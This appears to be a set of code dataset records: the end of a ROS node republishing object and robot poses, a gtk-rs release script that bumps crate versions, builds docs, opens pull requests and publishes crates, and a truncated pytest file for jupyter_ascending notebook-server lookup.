rospy.Subscriber('/sim_ros_interface/robots_pose_10', Float64MultiArray, self.callback_robot, queue_size=10)\n rospy.Subscriber('/sim_ros_interface/robots_pose_11', Float64MultiArray, self.callback_robot, queue_size=10)\n rospy.Subscriber('/sim_ros_interface/objects_pose', Objects, self.callback_objects, queue_size=10)\n self.pub_robot = rospy.Publisher(\"/visual_robot_perceptions\", Float32MultiArray, queue_size=10)\n self.pub_objects = rospy.Publisher(\"/objects_infos\", Float32MultiArray, queue_size=10)\n self.pub_joints = rospy.Publisher(\"/joint_statess\", JointState, queue_size=10)\n\n def prepare(self):\n dir_path = os.path.dirname(os.path.realpath(__file__))+\"/\"\n with open(dir_path+'object_list.txt','r') as f:\n i=0\n for line in f.readlines():\n tmp=line.lower().strip()\n if not tmp:continue\n self.obj_name2id[tmp]=i;i+=1\n #for k, v in self.obj_name2id.items():\n # print(k, v)\n \n\n def publish_objects(self):\n #objs = Float32MultiArray()\n for idx, dat in self.current_obstacles.items():\n #obj = Float32MultiArray()\n obj_info = []\n\n\n try:i = self.obj_name2id[dat.name.data]\n except:continue#i = int(dat.name.data.split('_')[-1])\n x = dat.bb3d.center.position.x * 1.0\n y = dat.bb3d.center.position.y * 1.0\n z = dat.bb3d.center.position.z * 1.0\n a = dat.bb3d.center.orientation.x * 1.0\n b = dat.bb3d.center.orientation.y * 1.0\n c = dat.bb3d.center.orientation.z * 1.0\n d = dat.bb3d.center.orientation.w * 1.0\n width = dat.bb3d.size.y * 1.0\n depth = dat.bb3d.size.x * 1.0\n height = dat.bb3d.size.z * 1.0\n \n orientation_list = [a, b, c, d]\n (a, b, c) = euler_from_quaternion(orientation_list) # object center orientation\n\n obj_info.append(x)\n obj_info.append(y)\n obj_info.append(z)\n obj_info.append(a)\n obj_info.append(b)\n obj_info.append(c)\n obj_info.append(d)\n obj_info.append(width)\n obj_info.append(depth)\n obj_info.append(height)\n obj_info.append(i)\n\n #print(obj_info)\n \n #objs.append(obj) \n #obj.data = obj_info\n self.pub_objects.publish(data=obj_info)\n\n def update(self):\n self.publish_objects()\n #self.publish_robot() \n\n def callback_objects(self, data):\n self.current_obstacles = {}\n for idx, dat in enumerate(data.detected_objects):\n self.current_obstacles[idx] = dat\n\n def callback_robot(self, data):\n print(data)\n try:\n robot_info = []\n idx = data.data[6]\n d, w, h = 0, 0, 0\n\n robot_info.append(data.data[0]) # x\n robot_info.append(data.data[1]) # y\n robot_info.append(data.data[2]) # z\n robot_info.append(data.data[3]) # a\n robot_info.append(data.data[4]) # b\n robot_info.append(data.data[5]) # c\n \n if idx == 10.0:\n d = 5.4177e-01 #0.64001\n w = 5.4177e-01#0.64001\n h = 6.9385e-01#1.20000\n elif idx == 11.0:\n d = 0.05\n w = 0.05\n h = 0.05 # 0.07\n elif idx == 12.0:\n d = 0.05\n w = 0.05\n h = 0.05\n else:\n d = 0\n w = 0\n h = 0\n\n robot_info.append(d) # d\n robot_info.append(w) # w\n robot_info.append(h) # h\n\n robot_info.append(data.data[6]) # x\n\n self.pub_robot.publish(data=robot_info)\n except:pass\n\n def callback_joints(self, data):\n self.pub_joints.publish(data)\n # LFinger_1,LFinger_2,LFinger_3,RFinger_1,RFinger_2,RFinger_3,fridge_top_joint,fridge_bottom_joint\n #print(data)\n\n\n##############################\n# Main function\n##############################\nif __name__ == '__main__':\n # ros initialize\n rospy.init_node('perception_listener') \n\n # perception manager\n pm = PerceptionListener()\n pm.prepare()\n\n # Start\n rospy.loginfo('[PerceptionListener] Service Started!')\n\n\n loop_freq = 100 # 10hz\n r = rospy.Rate(loop_freq)\n while not rospy.is_shutdown():\n pm.update()\n r.sleep()\n","sub_path":"perception_listener/src/scripts/perception_listener_cloud.py","file_name":"perception_listener_cloud.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"457549415","text":"#!/bin/python3\n\nfrom contextlib import contextmanager\n# pip3 install datetime\nimport datetime\nimport errno\nimport time\nimport shutil\nimport sys\nimport tempfile\nfrom os import listdir, sep as os_sep\nfrom os.path import isfile, join\n\n# local imports\nimport consts\nfrom args import Arguments, UpdateType\nfrom github import Github\nfrom globals import CRATES_VERSION, PULL_REQUESTS, SEARCH_INDEX, SEARCH_INDEX_BEFORE\nfrom globals import SEARCH_INDEX_AFTER\nfrom my_toml import TomlHandler\nfrom utils import add_to_commit, clone_repo, exec_command_and_print_error, get_features\nfrom utils import checkout_target_branch, get_file_content, write_error, write_into_file\nfrom utils import commit, commit_and_push, create_pull_request, push, revert_changes, write_msg\nfrom utils import create_tag_and_push, get_last_commit_date, merging_branches, publish_crate\nfrom utils import check_rustdoc_is_nightly, check_if_up_to_date\n\n\n@contextmanager\ndef temporary_directory():\n name = tempfile.mkdtemp()\n try:\n yield name\n finally:\n try:\n shutil.rmtree(name)\n except OSError as err:\n # if the directory has already been removed, no need to raise an error\n if err.errno != errno.ENOENT:\n raise\n\n\n# Doesn't handle version number containing something else than numbers and '.'!\ndef update_version(version, update_type, section_name, place_type=\"section\"):\n version_split = version.replace('\"', '').split('.')\n if len(version_split) != 3:\n # houston, we've got a problem!\n write_error('Invalid version in {} \"{}\": {}'.format(place_type, section_name, version))\n return None\n if update_type == UpdateType.MINOR:\n version_split[update_type] = str(int(version_split[update_type]) + 1)\n elif update_type == UpdateType.MEDIUM:\n version_split[update_type] = str(int(version_split[update_type]) + 1)\n version_split[UpdateType.MINOR] = '0'\n else:\n version_split[update_type] = str(int(version_split[update_type]) + 1)\n version_split[UpdateType.MEDIUM] = '0'\n version_split[UpdateType.MINOR] = '0'\n return '\"{}\"'.format('.'.join(version_split))\n\n\ndef check_and_update_version(entry, update_type, dependency_name, versions_update):\n if entry.startswith('\"') or entry.startswith(\"'\"):\n return update_version(entry, update_type, dependency_name, place_type=\"dependency\")\n # get version and update it\n entry = [e.strip() for e in entry.split(',')]\n dic = {}\n for part in entry:\n if part.startswith('{'):\n part = part[1:].strip()\n if part.endswith('}'):\n part = part[:-1].strip()\n part = [p.strip() for p in part.split('=')]\n dic[part[0]] = part[1]\n if part[0] == 'version':\n old_version = part[1]\n new_version = update_version(old_version, update_type, dependency_name,\n place_type=\"dependency\")\n if new_version is None:\n return None\n # Mostly for debugging, not really useful otherwise...\n versions_update.append({'dependency_name': dependency_name,\n 'old_version': old_version,\n 'new_version': new_version})\n dic[part[0]] = '\"{}\"'.format(new_version)\n return '{{{}}}'.format(', '.join(['{} = {}'.format(entry, dic[entry]) for entry in dic]))\n\n\ndef find_crate(crate_name):\n for entry in consts.CRATE_LIST:\n if entry['crate'] == crate_name:\n return True\n return False\n\n\ndef update_crate_version(repo_name, crate_name, crate_dir_path, temp_dir, specified_crate):\n file_path = join(join(join(temp_dir, repo_name), crate_dir_path), \"Cargo.toml\")\n output = file_path.replace(temp_dir, \"\")\n if output.startswith('/'):\n output = output[1:]\n write_msg('=> Updating crate versions for {}'.format(file_path))\n content = get_file_content(file_path)\n if content is None:\n return False\n toml = TomlHandler(content)\n for section in toml.sections:\n if section.name == 'package':\n section.set('version', CRATES_VERSION[crate_name])\n elif specified_crate is not None:\n continue\n elif section.name.startswith('dependencies.') and find_crate(section.name[13:]):\n if specified_crate is None and section.name[13:] not in CRATES_VERSION:\n input('\"{}\" dependency not found in versions for crate \"{}\"...'\n .format(section.name[13:], crate_name))\n continue\n section.set('version', CRATES_VERSION[section.name[13:]])\n elif section.name == 'dependencies':\n for entry in section.entries:\n if find_crate(entry['key']):\n section.set(entry['key'], CRATES_VERSION[entry['key']])\n result = write_into_file(file_path, str(toml))\n write_msg('=> {}: {}'.format(output.split(os_sep)[-2],\n 'Failure' if result is False else 'Success'))\n return result\n\n\ndef update_repo_version(repo_name, crate_name, crate_dir_path, temp_dir, update_type, no_update):\n # pylint: disable=too-many-branches,too-many-locals\n file_path = join(join(join(temp_dir, repo_name), crate_dir_path), \"Cargo.toml\")\n output = file_path.replace(temp_dir, \"\")\n if output.startswith('/'):\n output = output[1:]\n write_msg('=> Updating versions for {}'.format(file_path))\n content = get_file_content(file_path)\n if content is None:\n return False\n toml = TomlHandler(content)\n versions_update = []\n for section in toml.sections:\n if (section.name == 'package' or\n (section.name.startswith('dependencies.') and find_crate(section.name[13:]))):\n version = section.get('version', None)\n if version is None:\n continue\n new_version = None\n if no_update is False:\n new_version = update_version(version, update_type, section.name)\n else:\n new_version = version\n if new_version is None:\n return False\n # Print the status directly if it's the crate's version.\n if section.name == 'package':\n write_msg('\\t{}: {} => {}'.format(output.split(os_sep)[-2], version, new_version))\n CRATES_VERSION[crate_name] = new_version\n else: # Otherwise add it to the list to print later.\n versions_update.append({'dependency_name': section.name[13:],\n 'old_version': version,\n 'new_version': new_version})\n section.set('version', new_version)\n elif section.name == 'dependencies':\n for entry in section.entries:\n if find_crate(entry):\n new_version = check_and_update_version(section.entries[entry],\n update_type,\n entry,\n [])\n section.set(entry, new_version)\n for update in versions_update:\n write_msg('\\t{}: {} => {}'.format(update['dependency_name'],\n update['old_version'],\n update['new_version']))\n out = str(toml)\n if not out.endswith(\"\\n\"):\n out += '\\n'\n result = True\n if no_update is False:\n # We only write into the file if we're not just getting the crates version.\n result = write_into_file(file_path, out)\n write_msg('=> {}: {}'.format(output.split(os_sep)[-2],\n 'Failure' if result is False else 'Success'))\n return result\n\n\ndef update_badges(repo_name, temp_dir, specified_crate):\n path = join(join(temp_dir, repo_name), \"_data/crates.json\")\n content = get_file_content(path)\n current = None\n out = []\n for line in content.split(\"\\n\"):\n if line.strip().startswith('\"name\": \"'):\n current = line.split('\"name\": \"')[-1].replace('\",', '')\n if specified_crate is not None and current != specified_crate:\n current = None\n elif line.strip().startswith('\"max_version\": \"') and current is not None:\n version = line.split('\"max_version\": \"')[-1].replace('\"', '').replace(',', '')\n out.append(line.replace('\": \"{}\"'.format(version),\n '\": {}'.format(CRATES_VERSION[current])) + '\\n')\n current = None\n continue\n out.append(line + '\\n')\n return write_into_file(path, ''.join(out).replace('\\n\\n', '\\n'))\n\n\ndef cleanup_doc_repo(temp_dir):\n path = join(temp_dir, consts.DOC_REPO)\n command = ['bash', '-c', 'cd {} && git rm -rf *'.format(path)]\n if not exec_command_and_print_error(command):\n input(\"Couldn't clean up docs! Try to fix it and then press ENTER to continue...\")\n\n\ndef build_docs(repo_name, temp_dir, extra_path, crate_name):\n # pylint: disable=too-many-locals\n path = join(join(temp_dir, repo_name), extra_path)\n features = get_features(join(path, 'Cargo.toml'))\n # We can't add \"--no-deps\" argument to cargo doc, otherwise we lose links to items of\n # other crates...\n #\n # Also, we run \"cargo update\" in case the lgpl-docs repository has been updated (so we get the\n # last version).\n command = ['bash', '-c',\n ('cd {} && cargo update && cargo rustdoc --no-default-features '\n '--features \"{}\"').format(path, features)]\n if not exec_command_and_print_error(command):\n input(\"Couldn't generate docs! Try to fix it and then press ENTER to continue...\")\n doc_folder = join(path, 'target/doc')\n try:\n file_list = ' '.join(['\"{}\"'.format(f) for f in listdir(doc_folder)\n if isfile(join(doc_folder, f))])\n except Exception as err:\n write_error('Error occured in build docs: {}'.format(err))\n input(\"It seems like the \\\"{}\\\" folder doesn't exist. Try to fix it then press ENTER...\"\n .format(doc_folder))\n # Copy documentation files\n command = ['bash', '-c',\n 'cd {} && cp -r \"{}\" {} \"{}\"'\n .format(doc_folder,\n crate_name.replace('-', '_'),\n file_list,\n join(temp_dir, consts.DOC_REPO))]\n if not exec_command_and_print_error(command):\n input(\"Couldn't copy docs! Try to fix it and then press ENTER to continue...\")\n # Copy source files\n destination = \"{}/src\".format(join(temp_dir, consts.DOC_REPO))\n command = ['bash', '-c',\n 'cd {0} && mkdir -p \"{1}\" && cp -r \"src/{2}\" \"{1}/\"'\n .format(doc_folder,\n destination,\n crate_name.replace('-', '_'))]\n if not exec_command_and_print_error(command):\n input(\"Couldn't copy doc source files! Try to fix it and then press ENTER to continue...\")\n search_index = join(path, 'target/doc/search-index.js')\n lines = get_file_content(search_index).split('\\n')\n before = True\n fill_extras = len(SEARCH_INDEX_BEFORE) == 0\n found = False\n for line in lines:\n if line.startswith('\"'):\n before = False\n # We need to be careful in here if we're in a sys repository (which should never be the\n # case!).\n if line.startswith('\"{}\":'.format(crate_name.replace('-', '_'))):\n if line.endswith('}\\\\'):\n line = line[:-1] + ',\\\\'\n SEARCH_INDEX.append(line)\n found = True\n elif fill_extras is True:\n if before is True:\n SEARCH_INDEX_BEFORE.append(line)\n else:\n SEARCH_INDEX_AFTER.append(line)\n if found is False:\n input(\"Couldn't find \\\"{}\\\" in `{}`!\\nTry to fix it and then press ENTER to continue...\"\n .format(crate_name.replace('-', '_'), search_index))\n\n\ndef end_docs_build(temp_dir):\n path = join(temp_dir, consts.DOC_REPO)\n revert_changes(consts.DOC_REPO, temp_dir,\n ['COPYRIGHT.txt', 'LICENSE-APACHE.txt', 'LICENSE-MIT.txt'])\n try:\n with open(join(path, 'search-index.js'), 'w') as file:\n file.write('\\n'.join(SEARCH_INDEX_BEFORE) + '\\n')\n if SEARCH_INDEX[-1].endswith(\"},\\\\\"):\n SEARCH_INDEX[-1] = SEARCH_INDEX[-1][:-2] + '\\\\' # we remove the last comma\n file.write('\\n'.join(SEARCH_INDEX))\n file.write('\\n'.join(SEARCH_INDEX_AFTER))\n add_to_commit(consts.DOC_REPO, temp_dir, ['.'])\n except Exception as err:\n write_error('An exception occured in \"end_docs_build\": {}'.format(err))\n input(\"Press ENTER to continue...\")\n input('If you want to prevent \"{}\" to be updated, now is the good time! Press ENTER to '\n 'continue...'.format(join(path, \"main.js\")))\n\n\ndef write_merged_prs(merged_prs, contributors, repo_url):\n content = ''\n for merged_pr in reversed(merged_prs):\n if merged_pr.title.startswith('[release] '):\n continue\n if merged_pr.author not in contributors:\n contributors.append(merged_pr.author)\n md_content = (merged_pr.title.replace('<', '<')\n .replace('>', '>')\n .replace('[', '\\\\[')\n .replace(']', '\\\\]')\n .replace('*', '\\\\*')\n .replace('_', '\\\\_'))\n content += ' * [{}]({}/pull/{})\\n'.format(md_content, repo_url, merged_pr.number)\n return content + '\\n'\n\n\ndef build_blog_post(repositories, temp_dir, token):\n # pylint: disable=too-many-locals\n write_msg('=> Building blog post...')\n\n content = '''---\nlayout: post\nauthor: {}\ntitle: {}\ncategories: [front, crates]\ndate: {}\n---\n\n* Write intro here *\n\n### Changes\n\nFor the interested ones, here is the list of the merged pull requests:\n\n'''.format(input('Enter author name: '), input('Enter title: '),\n time.strftime(\"%Y-%m-%d %H:00:00 +0000\"))\n contributors = []\n git = Github(token)\n oldest_date = None\n for repo in repositories:\n checkout_target_branch(repo, temp_dir, \"crate\")\n success, out, err = get_last_commit_date(repo, temp_dir)\n if not success:\n write_msg(\"Couldn't get PRs for '{}': {}\".format(repo, err))\n continue\n max_date = datetime.date.fromtimestamp(int(out))\n if oldest_date is None or max_date < oldest_date:\n oldest_date = max_date\n write_msg(\"Gettings merged PRs from {}...\".format(repo))\n merged_prs = git.get_pulls(repo, consts.ORGANIZATION, 'closed', max_date, only_merged=True)\n write_msg(\"=> Got {} merged PRs\".format(len(merged_prs)))\n if len(merged_prs) < 1:\n continue\n repo_url = '{}/{}/{}'.format(consts.GITHUB_URL, consts.ORGANIZATION, repo)\n content += '[{}]({}):\\n\\n'.format(repo, repo_url)\n content += write_merged_prs(merged_prs, contributors, repo_url)\n\n write_msg(\"Gettings merged PRs from gir...\")\n merged_prs = git.get_pulls('gir', consts.ORGANIZATION, 'closed', oldest_date, only_merged=True)\n write_msg(\"=> Got {} merged PRs\".format(len(merged_prs)))\n if len(merged_prs) > 0:\n repo_url = '{}/{}/{}'.format(consts.GITHUB_URL, consts.ORGANIZATION, 'gir')\n content += ('All this was possible thanks to the [gtk-rs/gir]({}) project as well:\\n\\n'\n .format(repo_url))\n content += write_merged_prs(merged_prs, contributors, repo_url)\n\n content += 'Thanks to all of our contributors for their (awesome!) work on this release:\\n\\n'\n # Sort contributors list alphabetically with case insensitive.\n contributors = sorted(contributors, key=lambda s: s.casefold())\n content += '\\n'.join([' * [@{0}]({1}/{0})'.format(contributor, consts.GITHUB_URL)\n for contributor in contributors])\n content += '\\n'\n\n file_name = join(join(temp_dir, consts.BLOG_REPO),\n '_posts/{}-new-release.md'.format(time.strftime(\"%Y-%m-%d\")))\n try:\n with open(file_name, 'w') as outfile:\n outfile.write(content)\n write_msg('New blog post written into \"{}\".'.format(file_name))\n add_to_commit(consts.BLOG_REPO, temp_dir, [file_name])\n commit(consts.BLOG_REPO, temp_dir, \"Add new blog post\")\n except Exception as err:\n write_error('build_blog_post failed: {}'.format(err))\n write_msg('\\n=> Here is the blog post content:\\n{}\\n<='.format(content))\n write_msg('Done!')\n\n\ndef generate_new_tag(repository, temp_dir, specified_crate, args):\n # We make a new tag for every crate:\n #\n # * If it is a \"sys\" crate, then we add its name to the tag\n # * If not, then we just keep its version number\n for crate in args.crates:\n crate = crate['crate']\n if crate['repository'] == repository:\n if specified_crate is not None and crate['crate'] != specified_crate:\n continue\n tag_name = CRATES_VERSION[crate['crate']]\n if crate['crate'].endswith('-sys') or crate['crate'].endswith('-sys-rs'):\n tag_name = '{}-{}'.format(crate['crate'], tag_name)\n write_msg('==> Creating new tag \"{}\" for repository \"{}\"...'.format(tag_name,\n repository))\n create_tag_and_push(tag_name, repository, temp_dir)\n\n\ndef generate_new_branches(repository, temp_dir, specified_crate, args):\n # We make a new branch for every crate based on the current \"crate\" branch:\n #\n # * If it is a \"sys\" crate, then we ignore it.\n # * If not, then we create a new branch\n for crate in args.crates:\n crate = crate['crate']\n if crate['repository'] == repository:\n if specified_crate is not None and crate['crate'] != specified_crate:\n continue\n if crate['crate'].endswith('-sys') or crate['crate'].endswith('-sys-rs'):\n continue\n branch_name = CRATES_VERSION[crate['crate']]\n write_msg('==> Creating new branch \"{}\" for repository \"{}\"...'.format(branch_name,\n repository))\n push(repository, temp_dir, branch_name)\n\n\ndef update_doc_content_repository(repositories, temp_dir, token, no_push, args):\n if clone_repo(consts.DOC_CONTENT_REPO, temp_dir) is False:\n input('Try to fix the problem then press ENTER to continue...')\n write_msg(\"Done!\")\n repo_path = join(temp_dir, consts.DOC_CONTENT_REPO)\n write_msg(\"=> Generating documentation for crates...\")\n for repo in repositories:\n current = None\n for crate in args.crates:\n crate = crate['crate']\n if crate['repository'] == repo:\n current = crate\n break\n if current is None:\n input('No repository matches \"{}\", something is weird. (Press ENTER TO CONTINUE)')\n continue\n if current.get(\"doc\", True) is False:\n continue\n write_msg('==> Generating documentation for \"{}\"'.format(current))\n path = join(temp_dir, current['repository'])\n command = ['bash', '-c',\n 'cd {} && make doc && mv vendor.md {}'.format(path,\n join(repo_path,\n current['crate']))]\n if not exec_command_and_print_error(command):\n input(\"Fix the error and then press ENTER\")\n write_msg('Done!')\n write_msg('Committing \"{}\" changes...'.format(consts.DOC_CONTENT_REPO))\n commit(consts.DOC_CONTENT_REPO, temp_dir, \"Update vendor files\")\n if no_push is False:\n push(consts.DOC_CONTENT_REPO, temp_dir, consts.MASTER_TMP_BRANCH)\n\n # We always make minor releases in here, no need for a more important one considering we don't\n # change the API.\n if update_repo_version(consts.DOC_CONTENT_REPO, consts.DOC_CONTENT_REPO, \"\",\n temp_dir, UpdateType.MINOR, False) is False:\n write_error('The update for the \"{}\" crate failed...'.format(consts.DOC_CONTENT_REPO))\n input('Fix the error and then press ENTER')\n commit(consts.DOC_CONTENT_REPO, temp_dir, \"Update version\")\n if no_push is False:\n push(consts.DOC_CONTENT_REPO, temp_dir, consts.MASTER_TMP_BRANCH)\n create_pull_request(consts.DOC_CONTENT_REPO, consts.MASTER_TMP_BRANCH, \"master\", token,\n False)\n input(('All done with the \"{}\" update: please merge the PR then press ENTER so the '\n 'publication can performed...').format(consts.DOC_CONTENT_REPO))\n publish_crate(consts.DOC_CONTENT_REPO, \"\", temp_dir, consts.DOC_CONTENT_REPO,\n checkout_branch='master')\n write_msg('Ok all done! We can move forward now!')\n else:\n write_msg(('All with \"{}\", you still need to publish a new version if you want the changes '\n 'to be taken into account').format(consts.DOC_CONTENT_REPO))\n\n\ndef clone_repositories(args, temp_dir):\n write_msg('=> Cloning the repositories...')\n repositories = []\n for crate in args.crates:\n crate = crate['crate']\n if args.specified_crate is not None and crate['crate'] != args.specified_crate:\n continue\n if crate[\"repository\"] not in repositories:\n repositories.append(crate[\"repository\"])\n if clone_repo(crate[\"repository\"], temp_dir) is False:\n write_error('Cannot clone the \"{}\" repository...'.format(crate[\"repository\"]))\n return []\n if len(repositories) < 1:\n write_msg('No crate \"{}\" found. Aborting...'.format(args.specified_crate))\n return []\n if args.doc_only is False:\n if clone_repo(consts.BLOG_REPO, temp_dir, depth=1) is False:\n write_error('Cannot clone the \"{}\" repository...'.format(consts.BLOG_REPO))\n return []\n if clone_repo(consts.DOC_REPO, temp_dir, depth=1) is False:\n write_error('Cannot clone the \"{}\" repository...'.format(consts.DOC_REPO))\n return []\n write_msg('Done!')\n return repositories\n\n\ndef update_crates_versions(args, temp_dir, repositories):\n write_msg('=> Updating [master] crates version...')\n for crate in args.crates:\n update_type = crate['up-type']\n crate = crate['crate']\n if args.specified_crate is not None and crate['crate'] != args.specified_crate:\n continue\n if update_repo_version(crate[\"repository\"], crate[\"crate\"], crate[\"path\"],\n temp_dir, update_type,\n args.badges_only or args.tags_only) is False:\n write_error('The update for the \"{}\" crate failed...'.format(crate[\"crate\"]))\n return False\n write_msg('Done!')\n if args.badges_only is False and args.tags_only is False:\n write_msg('=> Committing{} to the \"{}\" branch...'\n .format(\" and pushing\" if args.no_push is False else \"\",\n consts.MASTER_TMP_BRANCH))\n for repo in repositories:\n commit(repo, temp_dir, \"Update versions [ci skip]\")\n if args.no_push is False:\n push(repo, temp_dir, consts.MASTER_TMP_BRANCH)\n write_msg('Done!')\n\n if args.no_push is False:\n write_msg('=> Creating PRs on master branch...')\n for repo in repositories:\n create_pull_request(repo, consts.MASTER_TMP_BRANCH, \"master\", args.token)\n write_msg('Done!')\n return True\n\n\ndef update_crate_repositories_branches(args, temp_dir, repositories):\n write_msg('=> Merging \"master\" branches into \"crate\" branches...')\n for repo in repositories:\n merging_branches(repo, temp_dir, \"master\")\n write_msg('Done!')\n\n write_msg('=> Updating [crate] crates version...')\n for crate in args.crates:\n crate = crate['crate']\n if args.specified_crate is not None and crate['crate'] != args.specified_crate:\n continue\n if update_crate_version(crate[\"repository\"], crate[\"crate\"], crate[\"path\"],\n temp_dir, args.specified_crate) is False:\n write_error('The update for the \"{}\" crate failed...'.format(crate[\"crate\"]))\n return False\n write_msg('Done!')\n\n write_msg('=> Committing{} to the \"{}\" branch...'\n .format(\" and pushing\" if args.no_push is False else \"\",\n consts.CRATE_TMP_BRANCH))\n for repo in repositories:\n commit(repo, temp_dir, \"Update versions [ci skip]\")\n if args.no_push is False:\n push(repo, temp_dir, consts.CRATE_TMP_BRANCH)\n write_msg('Done!')\n if args.no_push is False:\n write_msg('=> Creating PRs on crate branch...')\n for repo in repositories:\n create_pull_request(repo, consts.CRATE_TMP_BRANCH, \"crate\", args.token)\n write_msg('Done!')\n return True\n\n\ndef publish_crates(args, temp_dir):\n write_msg('+++++++++++++++')\n write_msg('++ IMPORTANT ++')\n write_msg('+++++++++++++++')\n write_msg('Almost everything has been done. Take a deep breath, check for opened '\n 'pull requests and once done, we can move forward!')\n write_msg(\"\\n{}\\n\".format('\\n'.join(PULL_REQUESTS)))\n PULL_REQUESTS.append('=============')\n input('Press ENTER to continue...')\n write_msg('=> Publishing crates...')\n for crate in args.crates:\n crate = crate['crate']\n if args.specified_crate is not None and crate['crate'] != args.specified_crate:\n continue\n publish_crate(crate[\"repository\"], crate[\"path\"], temp_dir, crate['crate'])\n write_msg('Done!')\n\n\ndef create_example_repository_pull_request(args):\n write_msg('=> Creating PR for examples repository')\n create_pull_request(\"examples\", \"pending\", \"master\", args.token)\n write_msg('Done!')\n\n\ndef generate_tags_and_version_branches(args, temp_dir, repositories):\n if args.no_push is True or args.doc_only is True or args.badges_only is True:\n return\n write_msg(\"=> Generating tags and branches...\")\n for repo in repositories:\n generate_new_tag(repo, temp_dir, args.specified_crate, args)\n generate_new_branches(repo, temp_dir, args.specified_crate, args)\n write_msg('Done!')\n\n\ndef regenerate_documentation(args, temp_dir, repositories):\n if args.badges_only is True or args.tags_only is True:\n return\n input(\"About to regenerate documentation. Are you sure you want to continue? \" +\n \"(Press ENTER to continue)\")\n update_doc_content_repository(repositories, temp_dir, args.token, args.no_push, args)\n write_msg('=> Preparing doc repo (too much dark magic in here urg)...')\n cleanup_doc_repo(temp_dir)\n write_msg('Done!')\n\n write_msg('=> Building docs...')\n for crate in args.crates:\n crate = crate['crate']\n if crate['crate'] == 'gtk-test':\n continue\n write_msg('-> Building docs for {}...'.format(crate['crate']))\n build_docs(crate['repository'], temp_dir, crate['path'],\n crate.get('doc_name', crate['crate']))\n end_docs_build(temp_dir)\n write_msg('Done!')\n\n write_msg('=> Committing{} docs to the \"{}\" branch...'\n .format(\" and pushing\" if args.no_push is False else \"\",\n consts.CRATE_TMP_BRANCH))\n commit(consts.DOC_REPO, temp_dir, \"Regen docs\")\n if args.no_push is False:\n push(consts.DOC_REPO, temp_dir, consts.CRATE_TMP_BRANCH)\n create_pull_request(\n consts.DOC_REPO,\n consts.CRATE_TMP_BRANCH,\n \"gh-pages\",\n args.token)\n write_msg(\"New pull request(s):\\n\\n{}\\n\".format('\\n'.join(PULL_REQUESTS)))\n write_msg('Done!')\n\n\ndef update_gtk_rs_blog(args, temp_dir):\n if args.doc_only is True or args.tags_only is True:\n return\n write_msg('=> Updating blog...')\n if update_badges(consts.BLOG_REPO, temp_dir, args.specified_crate) is False:\n write_error(\"Error when trying to update badges...\")\n elif args.no_push is False:\n commit_and_push(consts.BLOG_REPO, temp_dir, \"Update versions\",\n consts.MASTER_TMP_BRANCH)\n create_pull_request(\n consts.BLOG_REPO,\n consts.MASTER_TMP_BRANCH,\n \"master\",\n args.token)\n write_msg('Done!')\n\n\ndef checkout_crate_branches(temp_dir, repositories):\n write_msg('=> Checking out \"crate\" branches')\n for repo in repositories:\n checkout_target_branch(repo, temp_dir, \"crate\")\n write_msg('Done!')\n\n\ndef start(args, temp_dir):\n repositories = clone_repositories(args, temp_dir)\n if len(repositories) < 1:\n return\n if args.doc_only is False:\n if (args.blog_only is False and\n update_crates_versions(args, temp_dir, repositories) is False):\n return\n if args.badges_only is False and args.tags_only is False:\n build_blog_post(repositories, temp_dir, args.token)\n if args.blog_only:\n input(\"Blog post generated, press ENTER to quit (it'll remove the tmp folder and \"\n \"its content!)\")\n return\n\n checkout_crate_branches(temp_dir, repositories)\n\n if args.doc_only is False and args.badges_only is False and args.tags_only is False:\n if update_crate_repositories_branches(args, temp_dir, repositories) is False:\n return\n if args.no_push is False:\n publish_crates(args, temp_dir)\n create_example_repository_pull_request(args)\n\n generate_tags_and_version_branches(args, temp_dir, repositories)\n\n regenerate_documentation(args, temp_dir, repositories)\n\n update_gtk_rs_blog(args, temp_dir)\n\n write_msg('Seems like most things are done! Now remains:')\n write_msg(\" * Check generated docs for all crates (don't forget to enable features!).\")\n input('Press ENTER to leave (once done, the temporary directory \"{}\" will be destroyed)'\n .format(temp_dir))\n\n\ndef main(argv):\n args = Arguments.parse_arguments(argv)\n if args is None:\n sys.exit(1)\n if check_rustdoc_is_nightly() is False:\n return\n if check_if_up_to_date() is False:\n return\n write_msg('=> Creating temporary directory...')\n with temporary_directory() as temp_dir:\n write_msg('Temporary directory created in \"{}\"'.format(temp_dir))\n start(args, temp_dir)\n\n\n# Beginning of the script\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"src/release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":30900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"528206376","text":"import pytest\n\nfrom jupyter_ascending.errors import UnableToFindNotebookException\nfrom jupyter_ascending.handlers.jupyter_server import _clear_registered_servers\nfrom jupyter_ascending.handlers.jupyter_server import _make_url\nfrom jupyter_ascending.handlers.jupyter_server import get_server_for_notebook\nfrom jupyter_ascending.handlers.jupyter_server import register_server\n\n\nclass TestGetSever:\n def setup_method(self, _method):\n _clear_registered_servers()\n\n def test_clear_registered_servers(self):\n notebook_name = f\"hello.{SYNC_EXTENSION}.ipynb\"\n register_server(notebook_name, 1234)\n assert get_server_for_notebook(notebook_name) is not None\n\n _clear_registered_servers()\n with pytest.raises(UnableToFindNotebookException):\n get_server_for_notebook(notebook_name)\n\n def test_exact_match(self):\n notebook_name = f\"hello.{SYNC_EXTENSION}.ipynb\"\n notebook_port = 1234\n\n register_server(notebook_name, notebook_port)\n assert get_server_for_notebook(notebook_name) == _make_url(notebook_port)\n\n def test_stem_match(self):\n true_notebook_name = f\"/home/tj/git/notebook.{SYNC_EXTENSION}.ipynb\"\n remote_notebook_name = f\"/home/other/git/notebook.{SYNC_EXTENSION}.ipynb\"\n\n notebook_port = 1234\n\n register_server(true_notebook_name, notebook_port)\n assert get_server_for_notebook(true_notebook_name) == _make_url(notebook_port)\n assert get_server_for_notebook(remote_notebook_name) == _make_url(notebook_port)\n\n def test_more_than_stem_match(self):\n true_notebook_name = f\"/home/tj/git/notebook.{SYNC_EXTENSION}.ipynb\"\n do_not_pick_notebook = f\"/home/tj/do_not_pick/notebook.{SYNC_EXTENSION}.ipynb\"\n remote_notebook_name = f\"/home/other/git/notebook.{SYNC_EXTENSION}.ipynb\"\n\n notebook_port = 1234\n do_not_pick_port = 4444\n\n register_server(true_notebook_name, notebook_port)\n register_server(do_not_pick_notebook, do_not_pick_port)\n\n assert get_server_for_notebook(true_notebook_name) == _make_url(notebook_port)\n assert 